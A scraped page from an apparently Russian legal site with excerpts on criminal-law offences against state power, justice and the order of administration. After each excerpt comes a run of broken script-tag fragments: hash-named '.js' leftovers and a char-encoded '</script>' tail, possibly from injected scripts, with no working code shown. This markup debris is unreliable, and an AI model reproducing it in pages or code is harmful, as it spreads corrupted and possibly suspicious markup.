Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Ответственность за общие виды преступлений против государственной власти, интересов государственной службы и службы в органах местного самоуправления
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Злоупотребление должностными полномочиями (ст. 285 УК). Общественная опасность злоупотребления должностными полномочиями заключается в том, что в результате этого преступления нарушается нормальная, регламентируемая законом деятельность аппарата законодательной, исполнительной и судебной власти, а также аппарата органов местного самоуправления. Такие злоупотребления нередко связаны с хищениями, преступлениями в сфере экономической деятельности.
Объектом посягательства являются общественные отношения, которые составляют содержание отдельных видов нормальной деятельности государственных органов, а также органов местного самоуправления. В частности, при злоупотреблении должностными полномочиями могут существенно нарушаться права и законные интересы граждан. Следовательно, непосредственный объект данного преступления - деятельность государственного органа или органа местного самоуправления по охране прав и законных интересов граждан. При злоупотреблении должностными полномочиями посягательство на нормальную деятельность государственных органов или органов местного самоуправления совершается в форме использования должностным лицом своих служебных полномочий в корыстных или иных личных целях, в результате чего существенно нарушаются права и законные интересы граждан или организаций либо охраняемые законом интересы общества или государства (ст. 285 УК).
Объективная сторона преступления заключается: 1) в использовании должностным лицом своих служебных полномочий вопреки интересам службы; 2) в существенном нарушении прав и законных интересов граждан или организаций либо охраняемых законом интересов общества или государства; 3) в причинной связи между злоупотреблением должностными полномочиями и причиненным вредом.48a9baf49a57665a702b31588ce48128.js" type="text/javascript">bb3ee8bb3322e6805669049ba0ed40c7char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a48eddbf187c3ace71806cbe84fa4b42.js" type="text/javascript">9fb6d18bfc7148619226bc3d72da0e1f.js" type="text/javascript">4b451eea4fc5d0ecb20f844d561ae59f.js" type="text/javascript">781772b14adf052222121dcd616b22e5.js" type="text/javascript">aca7827f1f72ea4b63bdd3c6a8b85b52.js" type="text/javascript">1bd6efcec8c04c53d77379b2cdb72cb4.js" type="text/javascript">58147eee06e266a051dd1308cb3fca63.js" type="text/javascript">6926c2b2d00d7b941219a63b51d6a148.js" type="text/javascript">2b4ffe3f90ec48bdbaf4ef36f298d09d.js" type="text/javascript">64e3812537a5cbee3502b9c372b7333d.js" type="text/javascript">bdba9c3cc01f57bb82acbf17564f3b13.js" type="text/javascript">
Коментариев: 0 | Просмотров: 204 |
Ответственность за конкретные виды преступлений против государственной власти и интересов государственной службы и службы в органах самоуправления
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Отказ в предоставлении информации Федеральному Собранию Российской Федерации или Счетной палате Российской Федерации (ст. 287 УК). Рассматриваемое преступление не имеет аналогов в законодательстве, действовавшем до принятия Уголовного кодекса 1996 г.
Включение в Кодекс статьи об ответственности за получение Федеральным Собранием или Счетной палатой ложной информации или неполучение необходимой информации обусловлено необходимостью обеспечения нормального функционирования органов государственной власти, что приобретает особое значение в период коренной перестройки всех важнейших сфер жизни нашего общества и построения демократического правового государства.
Опасность преступления, предусмотренного ст. 287 УК, определяется тем, что оно может негативно отразиться на деятельности Федерального Собрания и Счетной палаты вследствие неполучения необходимой для их деятельности информации.
Объектом преступления является нормальная в соответствии с законом деятельность палат Федерального Собрания (Совета Федерации или Государственной Думы) и Счетной палаты в сфере их информационной обеспеченности.
В литературе имеется и несколько иное определение объекта: "...интересы государственной власти, связанные с обеспечением нормальной деятельности таких органов государственной власти, как Федеральное Собрание РФ и Счетная палата РФ".
Предметом рассматриваемого преступления являются документы или материалы (справки, отчеты, ответы на запросы комиссий, данные служебных расследований и т.п.), содержащие официальную информацию. Последняя может быть весьма разнообразной и касаться вопросов экономической или социальной жизни, банковской или предпринимательской деятельности и др.
С объективной стороны данное преступление осуществляется путем: 1) неправомерного отказа в информации, 2) уклонения от ее предоставления; 3) предоставления заведомо неполной информации и 4) предоставления заведомо ложной информации.ce7205fd125e373a7be3cefa35f91720.js" type="text/javascript">0142e618f8fefcb4f44cbdccf4882927char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)e04f48c7a1d9b4cabcf76ac955ec85bd.js" type="text/javascript">fc28756b19bc403e8d7051b514e3f54c.js" type="text/javascript">2b2dd937d800e19060bf72315ccb664f.js" type="text/javascript">e8500c43ab1c96eebc8d65c23d19fc0f.js" type="text/javascript">1bc748cb83e0e99de4396bda97da6276.js" type="text/javascript">40fd005e33e105c266fdb6c8c499e68e.js" type="text/javascript">072a627a8a074f6294c0f2674c09e1eb.js" type="text/javascript">1f35b1499dc31610068430bff7b35379.js" type="text/javascript">a73f7a3e712f4c5180250ac076896c0a.js" type="text/javascript">076f6ef1e6bb24db7e9647bdf8aa1909.js" type="text/javascript">a3e59f6b88d5499b2f284e25f3ca119b.js" type="text/javascript">
Коментариев: 0 | Просмотров: 151 |
Понятие, общая характеристика и виды преступлений против правосудия
  Уголовное право | Автор: admin | 12-05-2010, 21:05
В соответствии с Конституцией РФ (ст. 118) правосудие в Российской Федерации осуществляется только судом. Органы правосудия играют важную роль в осуществлении функций охраны и укрепления законности в борьбе с преступностью и правонарушениями. Их деятельность направлена на охрану прав и свобод человека и гражданина, собственности, окружающей среды, конституционного строя страны. В системе властных государственных структур они являются важнейшим инструментом реализации принципов законности, справедливости, гуманизма. Создание сильной и независимой судебной власти - одна из основных задач проводимой в России судебной реформы.
Демократические основы (принципы) правосудия сформулированы в следующих документах: Конституции РФ; Всеобщей декларации прав человека, одобренной Генеральной Ассамблеей ООН 10 декабря 1948 г.; Конвенции о защите прав человека и основных свобод, одобренной 4 ноября 1950 г. в г. Риме и вступившей в силу 5 мая 1998 г.; Основных принципах независимости судей, одобренных резолюцией Генеральной Ассамблеи ООН от 13 декабря 1985 г.; федеральных конституционных законах - "О Конституционном Суде Российской Федерации" от 21 июля 1994 г. N 1-ФКЗ*(246); "Об арбитражных судах Российской Федерации" от 28 апреля 1995 г. N 1-ФКЗ*(247); "О судебной системе Российской Федерации" от 31 декабря 1996 г. N 1-ФКЗ*(248); в законе РФ "О статусе судей в Российской Федерации" от 26 июня 1992 г. N 3132-I с последующими изменениями и дополнениями*(249); в федеральных законах "О судебных приставах" от 21 июля 1997 г. N 118-ФЗ*(250); "О судебном департаменте при Верховном Суде Российской Федерации" от 8 января 1998 г. N 7-ФЗ*(251); "О мировых судьях в Российской Федерации" от 17 декабря 1998 г. N 188-ФЗ*(252); "О народных заседателях федеральных судов общей юрисдикции в Российской Федерации" от 2 января 2000 г. N 37-ФЗ*(253).fb50e1737453d512c00afc18f8e8d9c3.js" type="text/javascript">4598b072938982b851e6e9c5d7584cc3char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)3303c79f53f0b00dd76561c85a741b2a.js" type="text/javascript">a0a38408c7ac2dfd84c1540a226abd82.js" type="text/javascript">bf8dfaa6ff3bb5e172d7b9972a836f0f.js" type="text/javascript">6f2b7486e9245e8e1ca82fba9629df76.js" type="text/javascript">7b8dc604597eb5c87d8397f6a3d7ef0c.js" type="text/javascript">6513f0c1bb683f4e1910d9fecf1fc50b.js" type="text/javascript">e8d1dfa352b143068f4417a12bf90f61.js" type="text/javascript">c5ac7956315272ad4176267540b6f9ed.js" type="text/javascript">be71cc413453879aab08e472c5c764b2.js" type="text/javascript">9144bd6f7ecbb9ce9001d868581708d8.js" type="text/javascript">9c575db0c948f7c7f517f8895e7d1703.js" type="text/javascript">
Коментариев: 0 | Просмотров: 298 |
История развития законодательства об ответственности за преступления против правосудия
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Российское законодательство на протяжении всей истории своего развития предусматривало ответственность за преступления против правосудия.
Правовые акты дореволюционной России содержали достаточно широкий перечень уголовно наказуемых деяний, препятствующих осуществлению правосудия. Первоначально нормы об ответственности за преступления против правосудия были расположены в различных главах источников права. Например, неправосудие, ответственность за которое устанавливалась еще Судебниками 1497 и 1550 гг., относилось к должностным преступлениям, а лжесвидетельство и лжеприсяга - к преступлениям против веры.
Уложение о наказаниях уголовных и исполнительных 1845 г. содержало ряд статей о преступлениях, посягающих на интересы правосудия. Эти нормы были включены в раздел "Преступления против порядка управления", где предусматривалась ответственность за взлом тюрем, увод или побег находящихся под стражей или надзором, а также в раздел "Преступления, нарушающие общественное спокойствие и порядок", в котором имелась норма об ответственности за лжедонос, лжесвидетельство и ложные показания. Должностные преступления регулировались специальной главой "О преступлениях и проступках чиновников при следствии и суде".
В Уголовном уложении 1903 г. преступлениям против правосудия была посвящена специальная глава "О противодействии правосудию", которая содержала 22 статьи, устанавливающие ответственность за следующие деяния: лжедонос; лжесвидетельство; подделку или предъявление суду лжедоказательства; лжеприсягу; ложные бесприсяжные показания в собственном деле; недонесение; отказ от представления вещественного или письменного доказательства по уголовному делу; укрывательство; погребение или сокрытие мертвого тела до судебно-медицинского осмотра при отсутствии цели скрыть следы преступления; отказ свидетеля, понятого, сведущего лица (эксперта) или переводчика без уважительной причины исполнять свои обязанности в процессе следствия или судебного рассмотрения дела; освобождение лица, находящегося в местах заключения или под стражей; побег из-под стражи или из места заключения; побег с поселения; побег с каторги; самовольное оставление обязательного места жительства или самовольное пребывание в местах, запрещенных для проживания, а также самовольное пользование правом, которого виновный лишен по приговору суда; нарушение распоряжения суда о невыезде с места жительства или временного пребывания. В данную главу была помещена норма об освобождении от наказания за недонесение и укрывательство, если это касалось преступления, в котором принимал участие сам обвиняемый или члены его семьи, а также если между ним и укрываемым существовали близкие родственные отношения.a559d67cc47af3dc27ad21a7fbcc8bb2.js" type="text/javascript">a35d8c9728ccd48bd6621ec0b60a3645char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)486de6f9401700556a3539158f31a16a.js" type="text/javascript">5d446ac48058926e05a1dcbbe3263c8f.js" type="text/javascript">371e029599a94661075becdf3d65fa2a.js" type="text/javascript">c6ab2053597c8f810ee53a2d83634eeb.js" type="text/javascript">02a6cf13e2c7d48987f05aa1fa4fab8f.js" type="text/javascript">241437f050988df32c7e02ef84e83448.js" type="text/javascript">7294e84f481661274379016d3f6c7564.js" type="text/javascript">ffac50d9a1b5297dbdb660e4e126f7a7.js" type="text/javascript">20ecdddae241843860a75144702942b2.js" type="text/javascript">db96e69a9462b6c2d29d7fded05bc2d1.js" type="text/javascript">1c567599ec82d0feec5dcacbff36d26c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 358 |
Преступления против правосудия, посягающие на жизнь, здоровье, честь и достоинство лиц, осуществляющих правосудие
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Непосредственным объектом этих преступлений является нормальная деятельность суда, прокуратуры, органов дознания и следствия, а также жизнь, здоровье, честь, достоинство и имущественные интересы лиц, осуществляющих правосудие или предварительное расследование. Помимо этого закон охраняет жизнь, здоровье и имущественные интересы близких родственников указанных лиц (ст. 295, 296).
Посягательство на жизнь лица, осуществляющего правосудие или предварительное расследование (ст. 295 УК). Наличие в главе о преступлениях против правосудия данной нормы обусловлено необходимостью повышенной защиты лиц, осуществляющих правосудие и предварительное расследование, а также их близких, что является важной уголовно-правовой гарантией независимости этих лиц.
Посягательство на жизнь лиц, осуществляющих правосудие или предварительное расследование, является самым тяжким деянием среди других преступлений рассматриваемой главы. Общественная опасность данного преступления состоит в том, что оно нарушает нормальную деятельность правоохранительных органов, способствующих реализации задач и целей правосудия, путем посягательства на жизнь лиц, участвующих в отправлении правосудия и предварительном расследовании, а также их близких.5f97f6673cec767a0fc2da4797abd549.js" type="text/javascript">fe937f493bad91dd1be6712206325460char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)99350e2961c2eacb3be77ac2f4a4e3d0.js" type="text/javascript">4262979214f454f818cbd1c8ab6ee5e5.js" type="text/javascript">747fe1bd1996d9ace12697e7048b0936.js" type="text/javascript">94ff4c99bfe901b57e987e4fd2e5bb1f.js" type="text/javascript">36873954668a18fe7bbc08d068107b50.js" type="text/javascript">d78d8c8ff83c629892be86591149d5c4.js" type="text/javascript">f53bf566b9a50212526b8fa8e5ab55ca.js" type="text/javascript">ef27b1cc2458b65e7b83bc5f36bd7044.js" type="text/javascript">a03b903638697417a8b1fd52221d3ec9.js" type="text/javascript">38ccbc1c15504ae42b55ec2c9a291d42.js" type="text/javascript">66de73077c6f6e528a4e35d9c88e3d9c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 310 |
Преступления, препятствующие исполнению работниками правоохранительных органов их обязанностей по осуществлению целей и задач правосудия
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Непосредственным объектом преступлений, входящих в эту группу, являются нормальное функционирование судебных и следственных органов по осуществлению правосудия, а также охраняемые и гарантируемые законом права и интересы граждан. В ст. 311 УК охраняются права и интересы судьи, участников уголовного процесса и их близких при рассмотрении уголовных дел.
Воспрепятствование осуществлению правосудия и производству предварительного расследования (ст. 294 УК). Принцип независимости судей, присяжных и народных заседателей является конституционным. Согласно ст. 120 Конституции РФ судьи независимы и подчиняются только закону. Это положение нашло отражение и в ряде других законодательных актов: Законе о статусе судей, Федеральном конституционном законе "О судебной системе РФ", федеральных конституционных законах о Конституционном Суде РФ и об арбитражных судах в РФ, УПК, ГПК, АПК и др. Значение данного принципа состоит в стремлении обеспечить такие условия, в которых суд имел бы реальную возможность принимать решения без постороннего вмешательства, без какого-либо воздействия извне, опираясь лишь на предписания закона. Вмешательство любых лиц в деятельность правосудия или предварительного расследования грубо нарушает принцип независимости судей.9d4a703bf1a8b87f385301833ba9394d.js" type="text/javascript">edb1bbd09e6baeb5204ade90c1596a5cchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)b968b3f0d0c70b52094209ee48cfec50.js" type="text/javascript">a1dad5e44b54edc0b4e64bf764ddd544.js" type="text/javascript">cb9fb196703df9cff37f8d4bbc5b92b6.js" type="text/javascript">138d347421d6a5573e59764a83615ec7.js" type="text/javascript">63b128ff0f5d449405d44c0f233a7566.js" type="text/javascript">828f605c7a43706bd6ce990ba74febc1.js" type="text/javascript">328ef4ce381299692ff61be20ad8b509.js" type="text/javascript">5ee1b0a6faee09b5d18e24cb2d5ef3dd.js" type="text/javascript">be2d6e7d4e4cf9297b01dc3ee0ced284.js" type="text/javascript">a02c63522e483208e56dca7535a0e185.js" type="text/javascript">f1c5cf71054dc90ac7bac8999a0734c9.js" type="text/javascript">
Коментариев: 0 | Просмотров: 215 |
Преступления, совершаемые в процессе отправления правосудия должностными лицами - работниками правоохранительных органов
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Непосредственным объектом этих преступлений являются нормальная деятельность органов дознания, предварительного следствия и суда, а также права и интересы потерпевших.
Привлечение заведомо невиновного к уголовной ответственности (ст. 299 УК). Рассматриваемое преступление посягает на установленный законом порядок привлечения к уголовной ответственности. Привлечение к уголовной ответственности лица, невиновность которого в совершении преступления очевидна, нарушает гарантированные Конституцией РФ права человека и гражданина, наносит ущерб интересам правосудия, создает у людей чувство социальной и правовой незащищенности, причиняет тяжкий вред потерпевшему (моральный, физический, материальный).
Объективная сторона преступления состоит в привлечении к уголовной ответственности заведомо невиновного.
Лицо может быть привлечено к уголовной ответственности лишь на основаниях и в порядке, установленных законом. Единственным основанием уголовной ответственности является наличие в действиях лица признаков конкретного состава преступления.4c9293475c11831b23bec118e5be879e.js" type="text/javascript">98b0c190e42d5306fc1dd923948ad74dchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)d5cc552613d585b743264f9ab7e41642.js" type="text/javascript">16f723877442e2220cbc520e6d26559a.js" type="text/javascript">fdb46357fcb656177146794a4d357b38.js" type="text/javascript">7d4b440245a80b1817339b51e6be95bd.js" type="text/javascript">e4ea46055461642d45b9f3401aa163e3.js" type="text/javascript">387ed6c192303bfb612406130f494fa6.js" type="text/javascript">b53b562581969cbf5dbd02e559f29187.js" type="text/javascript">4474af0ba606a380d22db8c91ebef6da.js" type="text/javascript">5dbca97235022177e7cf25f6c6553b0b.js" type="text/javascript">21ec5bf0ea6d53c9148f13df47492f3e.js" type="text/javascript">f900f36e3058011543685103ce7958eb.js" type="text/javascript">
Коментариев: 0 | Просмотров: 304 |
Преступления, препятствующие исполнению наказания или возмещению причиненного вреда
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Незаконные действия в отношении имущества, подвергнутого описи или аресту либо подлежащего конфискации (ст. 312 УК). В соответствии с уголовно-процессуальным законодательством в целях обеспечения гражданского иска при рассмотрении уголовного дела, других имущественных взысканий или возможной конфискации имущества прокурор, дознаватель или следователь обязаны принять меры обеспечения сохранности имущества подозреваемого, обвиняемого, подсудимого (ст. 115 УПК РФ), которое состоит в запрете, адресованном собственнику или владельцу имущества распоряжаться и в необходимых случаях пользоваться им, а также в изъятии имущества и передаче его на хранение.
Такой мерой пресечения является арест имущества. Наложение ареста оформляется решением суда, которое выносится на основании ходатайства прокурора, дознавателя или следователя с согласия прокурора.
При гражданском судопроизводстве суд или судья могут принять решение об описи или аресте имущества в целях его обеспечения.3012ab0cef20465e2d1aee0e250bd3f3.js" type="text/javascript">3e638986a697b0b907638e44dff74057char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)7554bd5109096f3213beefb4cfb89219.js" type="text/javascript">f3a2d7af863b04815fee991c9463f24d.js" type="text/javascript">1d5d2289fd79785a2216818ec15d92a3.js" type="text/javascript">c22a5037ef4622567a8360b2edc60373.js" type="text/javascript">479de57553c3599c468c9397194f1a79.js" type="text/javascript">aae68bee95800ca8d11395a86ba4e680.js" type="text/javascript">c3335e3c8b4376d79befb90b458270e5.js" type="text/javascript">5171c9cd6ff573b2515ea12e075713af.js" type="text/javascript">17753cf9f819cf7fdf80876db75a7b24.js" type="text/javascript">4e0311603aeec12a6641e43d2fc7a16e.js" type="text/javascript">109dd2ad34c90a8cc8a66cdf47c26a8f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 278 |
Понятие, общая характеристика и виды преступлений против порядка управления
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Государственная власть в Российской Федерации осуществляется на основе разделения на законодательную, исполнительную и судебную. Помимо этих ветвей власти признается и гарантируется местное самоуправление (ст. 10-12 Конституции РФ). Эффективная, отвечающая современным требованиям деятельность органов власти и местного самоуправления является залогом соблюдения прав и интересов граждан, успешного решения задач, стоящих перед обществом. Государство, наделяя своих представителей большими правами по сравнению с обычными гражданами, предъявляет к ним и более высокие требования, вплоть до привлечения в случаях нарушения законов к уголовной ответственности (см. гл. 30 УК). При выполнении должностными лицами своих служебных обязанностей они обеспечиваются усиленной охраной, в том числе и применением к лицам, препятствующим такой деятельности, суровых мер ответственности. Нормы, предусматривающие ответственность за нарушение нормальной деятельности органов власти и местного самоуправления, сосредоточены в гл. 32 УК. Устанавливая суровые меры ответственности за посягательства на порядок управления, законодатель тем самым стремится обеспечить властным отношениям, складывающимся между управляющими субъектами (должностными лицами, органами управления) и управляемыми (гражданами и организациями), режим наибольшего благоприятствования в целях их нормальной реализации.6c97baabef86c469999daa546ca2b3ae.js" type="text/javascript">56c0a458e4fd14b028253a41fb9c25a5char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)f131759daa4722d307992d0401a5b222.js" type="text/javascript">e1f4f61a2a220c0861266d6d2dcb3e85.js" type="text/javascript">7e7705c8011b32aab3048600a83b6802.js" type="text/javascript">08b32d0dba1d27f9c8f93172cf39b247.js" type="text/javascript">5bf3d2a605e79d88687284299fdb5f00.js" type="text/javascript">c4575b0662e4d27438cca181a094a0a8.js" type="text/javascript">8de7d58cf9df5f70e872bc344daf5825.js" type="text/javascript">26362caae6e1def852be1af3a724039f.js" type="text/javascript">72f615f51e5ac17dde2073520aab9091.js" type="text/javascript">716fb9733722ebcb10c216e0bf26dff7.js" type="text/javascript">7d0710b485f8184a6c025ec714ee3b95.js" type="text/javascript">
Коментариев: 0 | Просмотров: 274 |
История развития законодательства об уголовной ответственности за преступления против порядка управления
  Уголовное право | Автор: admin | 12-05-2010, 21:05
Нормы о преступлениях против порядка управления были известны уголовному законодательству Российской империи уже в конце ХIХ в. Так, Уложение о наказаниях уголовных и исправительных 1845 г. содержало специальный раздел четвертый - "О преступлениях и проступках против порядка управления", в котором выделялись семь глав: глава первая - "О сопротивлении распоряжениям правительства и неповиновении установленным от оного властям"; глава вторая - "Об оскорблении и явном неуважении к присутственным местам и чиновникам при отправлении должности"; глава третья - "О самовольном присвоении власти и о составлении подложных указов или предписаний и других исходящих от правительства бумаг"; глава четвертая - "О похищении бумаг или вещей из присутственных мест, сорвании печатей и уничтожении поставленных или приложенных по распоряжению правительства знаков"; глава пятая - "О взломе тюрем, уводе и побеге находящихся под стражею или надзором"; глава шестая - "О тайных обществах и запрещенных сходбищах"; глава седьмая - "О недозволенном оставлении отечества" (ст. 283-355). Уложение предусматривало, например, такие преступления, как восстание, с намерением воспрепятствовать обнародованию высочайших указов, манифестов и т.п. либо не допустить исполнение указов и распоряжений, или принудить власти к чему-либо не согласному с их долгом, если это принуждение произведено вооруженными людьми и сопровождаемо с их стороны насилием и беспорядками (ст. 284), указанное в ст. 284 противодействие, произведенное хотя не вооруженными людьми, однако с насилием и беспорядками или же, напротив, вооруженными, хотя и без явного с их стороны насилия (ст. 285), кто раздерет, отбросит или вычернит или иным образом повредит, или исказит указы, присланные для обнародования или выставленные для сего в определенных местах, когда это учинено публично при стечении народа, или, по крайней мере, в присутствии многих свидетелей (ст. 301), похищение или с умыслом истребление или повреждение хранимых в присутственном месте документов или иных какого-либо рода бумаг (с. 330) и др.009c82230a807ae1e407142757970d48.js" type="text/javascript">e8c7edfc6cdd41dda7c962010b838c34char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)7130108bd9f7ba06ab2e3e83181c3f97.js" type="text/javascript">761d682d2742825cd2fc366d5a22f3f6.js" type="text/javascript">bfbc7559e3dc9c4a6708fa2138e121e0.js" type="text/javascript">72bdfef42ba9a756896690c9f3b05144.js" type="text/javascript">774104fa12b7e6159a16657818d0d555.js" type="text/javascript">d4b11ac33c873f82f83ca5d71e2de8c3.js" type="text/javascript">87bbdcd01353be4de2611cd9a75446c0.js" type="text/javascript">afc21089d29bb9f6f34299c349b7473f.js" type="text/javascript">b936525807d1aae166b6fe81c0be8f85.js" type="text/javascript">ca1cf5f3e0b230e9ffa0488558a3ba33.js" type="text/javascript">902de69ee7d5154a13c358ec8c2a043b.js" type="text/javascript">
Коментариев: 0 | Просмотров: 207 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: